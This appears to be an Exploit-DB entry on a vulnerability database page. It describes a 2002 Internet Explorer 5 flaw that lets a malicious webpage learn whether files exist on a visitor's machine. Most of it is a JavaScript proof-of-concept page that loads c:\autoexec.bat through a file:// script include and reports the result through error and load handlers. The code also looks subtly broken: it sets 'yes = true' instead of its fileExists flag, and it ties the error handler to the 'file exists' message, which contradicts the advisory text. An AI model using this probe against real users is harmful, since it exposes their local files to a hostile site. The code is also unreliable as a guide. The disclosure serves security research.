Lucene search

K
exploitdbTom MicklovitchEDB-ID:21198
HistoryJan 03, 2002 - 12:00 a.m.

Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (1)

2002-01-0300:00:00
Tom Micklovitch
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

EPSS

0.023

Percentile

89.8%

source: https://www.securityfocus.com/bid/3779/info

Microsoft Internet Explorer is prone to a vulnerability which may disclose sensitive information to a malicious webmaster.

When script code includes a file outside of the document it is embedded in and the file does not exist, the onError event handler will run script if it is enabled. This script can determine whether the file to be included exists or not. This can be used to verify the existence of files on client hosts by creating webpages that include files from the local host using 'file://'. 

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

AI Score

7.4

Confidence

Low

EPSS

0.023

Percentile

89.8%

Related for EDB-ID:21198